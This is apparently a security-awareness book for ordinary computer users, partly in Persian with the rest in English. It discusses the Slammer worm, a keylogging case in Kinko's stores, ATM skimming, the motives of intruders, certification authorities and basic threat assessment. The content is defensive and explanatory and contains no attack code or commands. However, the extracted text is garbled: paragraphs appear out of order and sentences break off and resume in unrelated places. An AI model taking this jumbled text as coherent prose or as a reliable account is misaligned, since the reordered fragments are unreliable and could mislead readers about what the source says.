42 43 ٣٧ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻪ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺯﻳﺮ ﺩﺭﺑﺎﺭﺓ ﻛﺮﻡ Slammerﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺳـﺎﻝ ۲۰۰۳ﻣﻴﻼﺩﻱ ﺑﺎﻋﺚ ﺧﺮﺍﺑﻲ ﺷﺪﻳﺪ ﺩﺭ ﻛﺎﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺷـﺪ ﺗﻮﺟـﻪ ﻛﻨﻴﺪ .ﺩﺭ ﺍﺛﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺮﻡ ،ﻛﺸﻮﺭﻫﺎﻱ ﺯﻳـﺎﺩﻱ ﺍﺯ ﺗﻤـﺎﻣﻲ ﭘﻨﺞ ﻗﺎﺭﺓ ﺟﻬﺎﻥ ﺁﻟﻮﺩﻩ ﺷـﺪﻧﺪ ﻭ ﺑﺨـﺶ ﻋﻤـﺪﺓ ﺧﺮﺍﺑﻴﻬـﺎ ﻧـﺼﻴﺐ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺪ: ) Slammerﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ Sapphireﻧﻴﺰ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ( ﺳــﺮﻳﻌﺘﺮﻳﻦ ﻛــﺮﻡ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺍﺳــﺖ ﻛــﻪ ﺩﺭ ﻃــﻮﻝ ﺣﻴــﺎﺕ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻨﺘﺸﺮ ﺷﺪﻩ .ﺑﺎ ﺷـﺮﻭﻉ ﮔـﺴﺘﺮﺵ ﺁﻥ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺍﻳﻨﺘﺮﻧﺖ ،ﺑﻴﺶ ﺍﺯ %۹۰ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ٤٥ﺁﺳﻴﺐﭘﺬﻳﺮ ﺩﺭ ﻋﺮﺽ ۱۰ﺩﻗﻴﻘﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻧﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺍﺧﺘﻼﻝ ﺩﺭ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭ ﺳـﺘﺪﻫﺎﻱ ﻣــﺎﻟﻲ ﻭ ﺍﻣــﻮﺭ ﺣﻤـﻞ ﻭ ﻧﻘــﻞ ﻣﺆﺳــﺴﺎﺕ ﺩﻭﻟﺘﻲ ﺷﺪ ﻭ ﺟـﺎﻳﻲ ﺑـﺮﺍﻱ ﻋﻜـﺲﺍﻟﻌﻤـﻞ ﺍﻧـﺴﺎﻧﻲ ﺑـﺎﻗﻲ ﻧﮕﺬﺍﺷﺖ... Slammerﻗﺒــﻞ ﺍﺯ ﺳــﺎﻋﺖ ٤٦UTC ۵:۳۰ﺭﻭﺯ ﺷــﻨﺒﻪ ۲۵ﮊﺍﻧﻮﻳــﻪ ۲۰۰۳ﻣــﻴﻼﺩﻱ ﺑــﺎ ﺑﻬــﺮﻩﺑــﺮﺩﺍﺭﻱ ﺍﺯ ﻳــﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺳﺮﺭﻳﺰﻱ ﺑـﺎﻓﺮ ٤٧ﺑـﺎ ﻧﻔـﻮﺫ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻛـﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ Microsoft SQL Serverﻳﺎ Microsoft SQL Desktop Engine ) 2000 (MSDEﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﻧﻔﻮﺫ ﻛﺮﺩ ﻭ ﺑﻪ ﺁﺭﺍﻣﻲ ﺍﻗﺪﺍﻡ ﺑﻪ ﺁﻟﻮﺩﻩ ﺳﺎﺧﺘﻦ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣﻴﺰﺑـﺎﻥ ﻧﻤـﻮﺩ. ﺩﻳﻮﻳﺪ ﻟﻴﭽﻔﻴﻠﺪ ٤٨ﺩﺭ ﺟﻮﻻﻱ ﺳـﺎﻝ ۲۰۰۲ﻣـﻴﻼﺩﻱ ﺍﻳـﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ﻭ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻧﻴـﺰ ﻗﺒـﻞ ﺍﺯ ﺍﻧﺘــﺸﺎﺭ ﻛــﺮﻡ Slammerﻭﺻــﻠﻪﺍﻱ ﺑــﺮﺍﻱ ﺍﺻــﻼﺡ ﺁﻥ ٤٩ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺑﻮﺩ. ﺩﻭﻡ :ﻻﺯﻡ ﻧﻴﺴﺖ ﺷﻤﺎ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺣـﻀﻮﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺭﺍ ﺧﺪﺷـﻪﺩﺍﺭ ﻛﻨﻴـﺪ. ﻼ ﻳﻚ ﻧﻔﺮ ﺩﺭ ﺍﺭﻭﭘﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻣﻨﻴـﺖ ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﺜ ﹰ ﻲ ﻛـﺴﻲ ﻛـﻪ ﺩﺭ ﻫﻨـﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﻫﺪﻑ ﺩﺭ ﻫﻨﺪ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧ ﹺ ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻋـﺮﺽ ﻳـﻚ ﺧﻴﺎﺑـﺎﻥ ﺑـﺎ ﺁﻥ ﻫـﺪﻑ ﻓﺎﺻـﻠﻪ ﺩﺍﺭﺩ ﺧﺪﺷﻪﺩﺍﺭ ﻧﻤﺎﻳﺪ .ﺗﻬﺪﻳﺪ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻫـﺮ ﺟﺎﻱ ﺷﺒﻜﻪ ﺷﺮﻭﻉ ﺷﻮﺩ ﻭ ﺑﻪ ﺳﻤﺖ ﻫﺪﻓﻲ ﻣﻌﻠـﻮﻡ ﻭ ﻣـﺸﺨﺺ ﺟﻬﺖﮔﻴﺮﻱ ﻛﻨـﺪ؛ ﻭ ﻫـﺪﻑ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﺧﻄﺮﻧﺎﻙ ﺑﺎﻋﺚ ﻣﻲﺷﻮﻧﺪ ﻛـﻪ ﻣﺎ ﻧﺤﻮﺓ ﺗﻔﻜﺮ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫـﻴﻢ .ﻣـﻲﺗـﻮﺍﻥ ﮔﻔﺖ ﺍﻳﻦ ﻫﻴﭻ ﺍﺭﺯﺷـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺁﻳـﻴﻦﻧﺎﻣـﺔ ﺣـﻖ ﺗﻜﺜﻴـﺮ Digital Millenniumﻃﺮﺍﺣـﻲ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻗﻔـﻞﺷـﻜﻦ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻤﻴﺘﻪﻫﺎﻱ ﻣﻠﻲ ﻭ ﺟﻬﺎﻧﻲ ﺣﻖ ﺗﻜﺜﻴﺮ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿـﻮﻉ ﻭ ﺳـﺎﻳﺮ ﻣـﻮﺍﺭﺩ ﻣـﺮﺗﺒﻂ ﺑـﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ،ﻫﻨﻮﺯ ﻣﺸﻐﻮﻝ ﺗـﺪﻭﻳﻦ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﺟﺮﺍﻳـﻲ ٥١ ﻫﺴﺘﻨﺪ. 
is considerable. The lesson to be drawn from this is that security and deterrent measures must be capable enough to detect a breach of security while the offense is taking place or after it.

According to official reports, the worm mentioned above used this vulnerability to infect at least 75 thousand host computers - the real number being much higher than this - and caused severe disruption to the Internet and unforeseen consequences such as the cancellation of airline flights, disruption of elections, and failures in the operation of automated teller machines. [50]

Third: cyberspace has created a powerful but complex environment in which the task of providing security rests with several actors. For example, if you are a customer of an ISP, you have various ways to protect yourself and your personal computer, although you cannot control the security policies of the ISP you use or the way it implements them. Likewise, you cannot control your customers' software, even if you are in close contact with their systems. You must therefore adopt a strategy for protecting your assets, because you know that being connected to the outside world means you cannot neutralize every vulnerability of the network.

[49] http://www.microsoft.com/security/slammer.asp

[50] Moore, Paxson, Savage, Shannon, Staniford and Weaver, "Inside the Slammer Worm," IEEE Security and Privacy, Vol. 1, No. 4, July/August 2003, pp. 33-39.

[51] For recent commentary on this act, see the following references:
U.S. Copyright Office Digital Millennium Copyright Act Study: http://www.copyright.gov/reports/studies/dmca/dmca_study.html
DMCA: http://www.copyright.gov/legislation/hr2281.pdf
What are the likely risks in cyberspace? If you have taken no security considerations into account, some of the consequences that may follow are:

• Destruction of information - The data stored on your computer may be deleted. It can usually be recovered, but the process will be time-consuming and probably incomplete. If you are a government institution, your operations may be disrupted during this period.

• Theft of information and violation of privacy - You may learn of a theft of information immediately or only after a delay, and that is an entirely separate matter from finding out who has obtained your data, what information is in their hands, or what they will do with it. If a large amount of your personal information has been stolen, the thief very probably holds your key information, and this can have unknown and rather dangerous consequences.

• Violation of information integrity - The information on the computer may be changed and tampered with without your knowledge. Depending on the kind of information you keep, the consequences of this tampering can be short-term or long-term. If the data includes financial records, customer information, the status of orders or employee files, the consequences of a loss of integrity may be very costly and damaging.

• Compromise of network integrity through other systems and networks - Although in this case you have not been attacked directly, other computers to which you have had access may be attacked, and this may affect you as well. In that case, if you are for example a financial and credit institution, you will not be able to complete your financial transactions during the period of information recovery.
• Keystroke logging - Hidden software can be installed on your computer that records the keys you press on the keyboard and sends them to another computer. This can compromise access to external resources, such as access to a protected web server, access to an e-mail server, financial transfers, or the receipt of confidential information. In this situation the thief can obtain your authentication tokens, credit card number and passwords and use them later for personal gain.

• Denial of access - You may be deprived of access to your own information even though that information has not been erased. For example, your information may turn up in encrypted form, with only the attacker holding the decryption key.

The cost of recovering successfully from any of these attacks is considerable, and in some cases recovery appears to be impossible. If you manage an advertising outlet that depends heavily on its electronic data resources, a destructive attack can bankrupt your organization. Note that the Slammer worm infected systems on which the patch provided by Microsoft had not been installed.

One security intrusion that operated successfully for more than a year illustrated new ways in which security in cyberspace can be compromised:

"Associated Press (New York) - For more than a year, Juju Jiang recorded what people typed at Internet terminals in Kinko's stores in New York, without the knowledge of the people using them.
Jiang had secretly installed, in at least fourteen Kinko's stores, software that was able to record the pressing of

This case, which earlier this month, following Jiang's arrest, resulted in a penalty being determined for him, reveals the dangers of using public Internet terminals in Internet cafes, libraries, airports and other establishments. Neel Mehta, a research engineer at Internet Security Systems, warns: "Use your common sense when using any public terminal. For many everyday communications, such as connecting to the web, you may not run into any problem, but before doing anything that may be sensitive, think a little first." Jiang was arrested when, according to court records, he had used one of the stolen passwords to access a computer equipped with the GoToMyPC software. This software lets people access their own computer remotely from anywhere. The person on whose computer GoToMyPC was installed was at home at the time of the offense, and suddenly noticed that the cursor on his computer had started moving across the screen and that files were opening by themselves. He then saw a bank account being opened and his name being entered in an online shopping service. Jiang, who is awaiting sentencing, finally confessed on the fourteenth of February 2001 to installing hidden keystroke-logging software in Kinko's stores. [60]
This book is a guide to the security of users in both the home and the business environment, and so it contains extensive information on security topics such as risks, the consequences of attacks, methods of protecting computers, networks and data, and the policies that must be examined before an effective security strategy is implemented. The ultimate goal of this book

[60] Associated Press Bulletin, July 23, 2003

What motivates security vandals?

In real life there are many motives for committing criminal offenses against a person or an organization. One of the main reasons is the offender's wish to take revenge on someone he believes has harmed him, or to obtain money.

The same kinds of offenses exist in cyberspace, but offenses in this space are of a different nature. For one group of people - who are generally called "vandals" and who are able to break into people's user accounts or to harm others for fun and entertainment - cyberspace is a challenging environment. In other words, they regard the power to break into user accounts, databases and network equipment as a matter of pride. Behavior of this kind is very rare in the real world.

Vandals usually regard their activities as "victimless crimes". Their argument is this: when a user account or a database is broken into but nothing is changed or stolen, what harm has been done to anyone? In reality these people pay no attention to the legal effects and consequences of what they do, and attach no importance to the feeling of insecurity that their activities create in their victims. The real-world equivalent of this behavior is someone entering your home and being able to do so again whenever he likes. That would certainly be intolerable for you.

Unfortunately, the Internet is a great help to those who violate security.
people's keys. Over its year of operation, this software recorded more than 450 usernames and passwords and used them to access, and even to open, online bank accounts.

is not to keep users away from the resources offered in the new digital environments, but to empower users to enjoy this new world in a safe and secure way. In short, the aim of publishing this book is to develop a realistic and deep understanding of the nature of existing security problems, in order to reduce vulnerabilities and increase the strengths of information and communication technology.

Some vandals possess intrusion tools that allow even novice intruders to exploit certain vulnerabilities successfully. Such tools are usually posted to Usenet newsgroups, which are very well known, and all sorts of people can find a tool there and put it to use. Since many of these tools may be harmless, no one is ever sure exactly what the effects of using any one of them are. Moreover, by making changes to some of these so-called harmless tools, it may be possible to damage the computers and user accounts that are accessed through them. One such case is described below:

Document CA-203-18 of the computer security emergency response center has documented the latest hole in Windows, and CNet has reported that exploiting this vulnerability to break into Windows paves the way for the lightning emergence and severe attack of another worm:

Security researchers have warned that a group of hackers has released a program that is designed to exploit a major flaw in Windows and that opens the way for a large attack by the end of the current week. The warning was issued on Friday, after Chinese hackers of the security group X Focus published, to several security centers around the world, the source of a program that was skillfully designed to break into computers running the Windows operating system.
The X Focus group's program exploits the flaw in Microsoft's operating system and allows hackers to break into a system remotely. Several experts have described this flaw as the biggest flaw found in Windows so far. [61]

[61] CNet News.com, July 25, 2003

The growing number of attacks carried out by relatively unskilled people is also a long and continuing story.

Of course, not all security breaches are specific to computers and the Internet. Automated teller machines have also been used to steal confidential information. In one case (in the state of Connecticut in the United States) thieves installed a device resembling an ATM in a shopping center. When people inserted their card and entered their PIN to withdraw money from this machine, the fake device stored the codes and so made later unauthorized access to those accounts very easy; but because it had no connection to real credit centers, it was unable to complete financial operations. In another case the thieves used ATMs in such a way that money could actually be transferred, but some time later they carried out thefts using the recorded information.

Although most of the observable crimes in the cyber world are committed by individuals, organizations and institutions are also capable of abusing the characteristics of this space to achieve their organizational goals. Organized crime may consist of manipulating the Internet to reach the results its perpetrators want, but it can also lead to crimes being committed against others. Some organizations may wish to manipulate the result of a poll, or even of an election, to reach the outcome they want. Some institutions have already invested heavily in this and may be able to keep it up vigorously for a long time.
Clearly, the potential benefits of the new digital age are countless. It is very important that we protect these benefits by securing our physical environment, infrastructure, computers, communication lines and information resources. The first step in doing so is to reach an adequate and correct level of understanding of the technology, which can help us make sensible decisions about how to reach the desired level of security. Many of us play several roles here: we may use these resources as an ordinary user, be responsible for the digital systems and services of an organization, or be interested in working with the government on implementing policies that support security.

In each of these roles all of us are responsible for achieving the desired level of security. Unfortunately, security in a complex environment is usually only as strong as the security of the weakest component of that environment; we must therefore make sure that the components of the environment that we control are strong enough that even the weakest

The importance of security for small and medium-sized organizations in developing countries

Although security matters to everyone, it is especially important for small and medium-sized organizations in developing countries. The results of entering the global market with the help of information and communication technology are very attractive, but the risks of doing so insecurely are also very fundamental.

In many lines of business, manual operations have given way to management by computer. In many sectors of the economies of developed countries, standalone computers could be used for a certain period of time. With the introduction of new computing resources, managers are moving toward acquiring knowledge and information about practical matters such as backup, network maintenance, software updating and computer auditing. Success in all of these requires familiarity with computers, networks and the concepts of information security.
With the introduction of network communications and the possibility of entering electronic commerce, system processes and management processes must be looked at from two different viewpoints. Standalone systems are generally product-oriented or process-oriented (for example inventory and orders, or processes such as production, the general ledger, and accounts payable and receivable), but successful online e-commerce systems are organized differently. To succeed, these systems must be designed around the customer, and the system must follow the customer's behavior through searching for and evaluating products, placing an order, completing the financial transaction and tracking the product that has been shipped. In these systems, concern for products and processes is still important, but it takes second place to the need to follow the customer's behavior on the website and to carry out whatever transaction the customer requests. To achieve success, this redesign

Small and medium-sized organizations must be aware that changing the approach of their business systems in order to use the Internet brings new risks for them. One of these risks is the newest of all: the possibility that the company's assets will be stolen and put up for sale. In an age when the goods and services sold consist of information products, they may be distributed and supplied illegally, either free of charge or on the black market, in which case the profit goes to the thieves and not to the company that produced the information.
of them is able to defend against the existing threats.

is necessary, but it requires an alternative approach to managing customers' purchase requests; an approach that, if implemented without sufficient care, may leave the way open for new methods of security intrusion.

The most prominent example of illegal copying to be seen today is found in the music industry, where it has led to the distribution of stolen products, mostly in the form of compact discs. Protecting digital assets is at present an unsolved problem, although many steps have been taken to solve it. Nearly perfect copies of digital information products have been made for a long time, because copying them is easy and at the time of sale there is no need to look for the original. The technology used in the music industry can also be used in other circumstances and environments, which means that trade secrets or other confidential information can also be obtained and published by methods that do severe damage to the business and industry concerned. Valuable assets need adequate and appropriate protection. This level of security can indeed be established, but the risks and working methods of a company that operates in electronic commerce differ from the risks and working methods of a company that trades in the traditional way.

Toward a new concept of trust

The new digital environment requires us to reconsider our definition of trust. In the real world we use a wide range of criteria to decide how far to trust a person, a process or an organization; for example, we compare what we currently observe with our previous experience and knowledge. When information is exchanged in cyberspace, most of the non-verbal cues of communication are lost.
When we receive an e-mail message or read a web page, we cannot always tell whether the information is accurate, or whether checking it would show that it is not correct. Nor do we know whether the errors that have occurred are the result of carelessness or of deliberate attempts to deceive us. In the absence of information, we do not even know whether the author of a message is the person he claims to be.

Certainly fraud also occurs in the real world, but it is usually easier to establish the truth when people are physically present and places really exist.

Fortunately, certification authorities have been a great help with this aspect of security in the cyber world. These authorities formally issue certificates that identify individuals and organizations. The concept also exists in the real world: if you hold a national passport, the government of a country has confirmed your identity, and so the passport is a token that you can use to prove who you are. Similarly, if you hold a motor vehicle driving license, a national or regional government body has issued you a permit that both confirms your identity and authorizes you to drive a vehicle. Companies that provide credit card services also vouch for you by issuing credit cards. Your employer or school may also vouch for you by means of an identity card, and that card may give you access to particular services reserved for the employees or students of a particular domain.

authority to the next; some of them may require full proof of your identity, while others may accept whatever you state.
Certification authorities in the cyber world share these characteristics. Several levels of identity verification are established for different degrees of assurance, and each certificate is valid only at its own level. So although it may seem that a single certification authority would be enough to serve every purpose, there are several certification authorities in the virtual world. In addition, with electronic certification these certificates can be signed electronically, giving assurance that the certificate transmitted is correct and genuine. These certification systems are more robust than the empirical and intuitive methods used in the real world. In the digital world, more robust methods are needed to establish the trust required to support commercial transactions and financial transfers over electronic networks.

Governments have an important role in ensuring that suitable mechanisms exist for the new models of trust to work and to be used. The ability of small and medium-sized organizations to carry out transactions electronically depends on the existence of this trust. In some countries, governments believe that government bodies should act as certification authorities, and in other countries governments believe that the task of certification authorities should be left to the private sector. Whatever the details of implementation, the purpose of establishing these authorities is clear. Government policy can facilitate the mechanisms that create trust, so that the country's individuals, organizations and individual users are also able to take part in the electronic commerce of other countries.
Clearly, certification authorities in the real world are few in number. In general, each of these authorities has a particular purpose in vouching for you. The thoroughness of identity verification differs from one

Summary

All individuals and countries benefit from information technology, but this technology has a special appeal for developing countries and can speed up their integration into the global economic community. The technology is still at the beginning of its path, but it is advancing rapidly. Unfortunately, like other technological advances, the Internet can be used for both legitimate and illegitimate purposes. As we have seen, the cyber world contains criminals and vandals who use the Internet to attack individual and organizational users.

The concept of "cyber safety" is an important one. The examples in this chapter, the number of incidents reported to CERT, and the new incidents reported in the press every day all show why awareness of security issues is important and why steps must be taken to ensure the protection of personal computers, data and business.

This book contains a collection of best practices in security that help in implementing the policies and methods relevant to your particular situation. It also introduces many printed and electronic references that cover particular aspects of information technology security, as well as organizations that specialize in information technology security topics. All of these resources will be useful to individuals and organizations that seek to broaden their awareness of security in the networked world.

These conditions are of particular importance in developing countries. Foreign direct investment and trust in these countries depend on the level of security and on the successful implementation of the technology and its infrastructure.
Governments, organizations and individual users all play a significant part in securing countries' information and electronic assets. Knowing the threats is very useful, and acting appropriately on that knowledge can create a trustworthy environment and allow the inhabitants of the Earth to feel the benefits of the new digital age as fully as possible.

Digital technology provides new and exciting tools, each of which can play a significant part in education, health, welfare, commerce and other sectors of civil society.

Information Technology Security and Individual Users
Chapter 1. Introduction
Chapter 2. Understanding Security Concepts
Chapter 3. Security of Computers and Data
Chapter 4. Security of the Operating System and Application Software
Chapter 5. Malicious Software
Chapter 6. Security of Network Services
Chapter 7. Tools for Improving Security
Chapter 8. Special Notes for Different Platforms
Appendix 1. Introduction to Encoding and Encryption
Appendix 2. TCP/IP
Appendix 3. Glossary of Technical Terms

Chapter One
Introduction

Part Two concentrates mainly on security for individual computer users, from beginners to experts; the first matter to be explained here is how to protect personal computers.

A computer can be used safely, but doing so takes information, astuteness and a great deal of care. The language used in this discussion sometimes involves unfamiliar concepts. Some of the terms and definitions are given in the appendix at the end of this part, and some of them are also set out in full in Annex 1 of the book.
The first step in setting out a sound security strategy is to define what is meant by the "proper use" of personal computers and by "protecting" them. If this is what you are looking for too, make sure that:

• your data and programs are changed or erased only when you want them to be;
• computer programs behave as their designer or programmer intended (apart from software bugs, whose presence in programs is unintended);
• no one can use your data, computer or network without your permission;
• the computer does not unintentionally spread virus-infected files;
• no one is able to observe the changes you make on the computer;
• no one is able to get at your data, whether on wireless or on wired networks;
• no one is able to steal your username and password on the systems or websites you access;
• if you enter your credit card number or your bank account details over the Internet, the data concerned will be completely secure (you will of course have no control over what happens at the other end of the communication network);
• and ...

When security considerations are neglected on personal computers, various consequences follow: they may cause the person annoyance without costing anything, or they may impose heavy costs and take up a great deal of time. Where protecting the computer is part of the person's job, the resulting problem may put his position at risk. In every case the person must assess the risk, adopt the necessary security plan and carry it out. The details given here about information technology security make it possible to control every aspect of the security of personal computers. If the guidance in this book is also applied, the risk can be reduced to an acceptable level and the best use can be made of the changing world of information technology.
Naturally, setting out every security point for personal computers would take hundreds of pages, but readers usually have little inclination to read large volumes of material. This text presents a summary of the information users need in order to understand and implement the security points for personal computers. The references listed in the appendices, which include electronic resources, relevant organizations and printed documents, can also be of useful help and encourage the user to read further about information technology security.

business programs written by the user.

• Threats from computer criminals - Along with advances in technology, a group of vandals has emerged who profit from stealing computer data. In some cases this is done purely for pleasure and entertainment, and some people do such things only to show off to their friends; but in other cases it is done for personal and organizational gain (theft of credit card information or entering into fraudulent transactions). In all of these cases these people cause damage and spread distrust, and on a wider scale they create critical problems that harm individuals and their jobs. It has to be said that since the Internet became available to users on a global scale, pursuing and stopping attackers, although still possible, has become very complicated.

Chapter Two
Understanding Security Concepts

Overview

This chapter explains why it is necessary to establish security and to protect the network and the computer. It deals with the consequences of a security intrusion, the initial measures for countering one, and a few technical definitions of security topics. Fuller definitions are given in Appendix 1 of this chapter and in Annex 1 of the book.
Why are security measures necessary?

In the early days of computer use, shared systems identified people by username alone, and there was no need to enter a password. After malicious users began to abuse this arrangement, passwords were added to those systems as well. Today administrators have to think about the security of networks and computers more than ever before. The most important reasons for this are:

• The value of the investment in hardware and software - Computers and software packages are very expensive, and replacing them is costly and difficult. Even if a security incident does not completely destroy the software and hardware, security problems may force us to reinstall all the software, after which all the basic requirements have to be defined again. This takes a great deal of time, especially if the person responsible does not have enough technical knowledge in this area.

• The value of organizational data - This data may include customer lists, financial projects, or

• The value of personal data - Personal data may not be worth much in material terms, but losing it may be very damaging, and recreating the information may take a great deal of time (see the definitions related to identity theft).

Why is security usually a weak point?

Software is often produced without security issues being taken into account. There are several reasons for this:

• Negligence - Programmers and designers are unaware of the importance of security points.

• Low priority - Until recently, even those who were aware of security points did little about them, and as a result security issues did not receive the attention they needed.

• Limits on time and cost - Some people imagine that security measures in design, coding and testing during the software production process are extremely costly and take up a great deal of time.
• Lack of discipline among programmers - In programming work, the same mistakes are repeated many times and create security flaws.

• The creativity of criminals - Human beings are creative, and motivated people will always find a way to overcome security barriers and to discover the mistakes that lead to security flaws.

• Users' low level of awareness - Ordinary users (the victims of security offenses) are naturally unaware of the threats around them, and for that reason do not look for suitable ways to ensure the security of their data and systems.

• Victims' unrealistic outlook - Some users are aware of security points but do not take them seriously, because they assume that no attack will be made on them.

Assessing threats and their costs

To understand the importance of security points, several questions have to be answered. First suppose that the events below have happened, then try to assess the likely consequences of each one, and in each case answer the key questions given after these scenarios.

What will happen if...

...someone breaks into your home or workplace and steals your computer, and also takes your backup disk, which may be nearby.

...all the data on your computer is erased.

...a copy of all your data is stolen. This data may include such things as bank account information, a list of usernames and passwords for online shopping websites, important work reports, and coursework worth 50% of your marks for the current term.

...someone watches and remembers, moment by moment, everything you do with the computer: learns your credit card number when you enter it, knows which websites you browse, and is able to steal the username and password when you connect to a website or to other systems.

...your computer develops a fault while you are working on an important project in which time is critical.

...a destructive computer virus is sent to all of your friends whose names are recorded in your computer's address book.
...you receive your telephone bill and see that the amount is even more than your monthly salary, although you are sure you have not used the telephone that much.

...a credit card statement is sent to you and you see that the statement is not yours, but the bank tries to convince you that you have used your card to this extent and has evidence for its claim.

The key questions that must be answered in each case are as follows:

• If it happens, is recovery possible?
• How much time will the incident take up?
• How much will it cost?
• How can it affect your organization?
• What incidental costs does it involve? (for example, under unfavorable conditions and in the absence of the person responsible)

All of these cases show how important "computer security" is. Now that you have seen that security is a very important matter, the next step is to consider a suitable security plan for becoming secure:

• What will becoming secure cost you?
• How much time will it take?
• How much trouble will it cause?
• Are there tasks that will become difficult or impossible once the security plan is implemented?
• Can you carry out the plan on your own, or do you need help from others to carry it out?

What will becoming secure cost you?

There are several suitable security solutions that do not need much equipment, and the equipment they do need is not especially expensive. Even virus scanners, the most common security product, are available as freeware. A list of organizations that offer freeware is given in the appendices.

How much time will it take?

Implementing a security plan and keeping it up certainly takes time, but not a great deal. You need to install suitable software and then carry out the usual protective tasks according to a fixed routine.
How much trouble will it cause you?

The amount of trouble depends on your point of view. You must be aware of what you are doing, and must never assume that everything is inherently secure. For example, if an e-mail message someone sends you carries an attachment,

Are there tasks that will become difficult or impossible once the security plan is implemented?

Yes; to become secure you have to change the way you work to some extent. Choosing a plan for greater security makes you more aware of potential problems, which you must prevent as far as you can. New software packages have many attractive features, but using them - especially those used to extend the network and to send and receive messages - increases your vulnerability to attack. For example, there may be a website that offers the services you want, but to access it you have to download a particular piece of its software and run it on your own computer. If you do not have enough trust in the people who provide these services, it is better to do without the features that the program could bring you.

Can you carry out the plan on your own, or do you need help from others to carry it out?

The assumption is that you are responsible for every aspect of the security of your own system, but in practice it may be better to get help from others so that the job is done better.
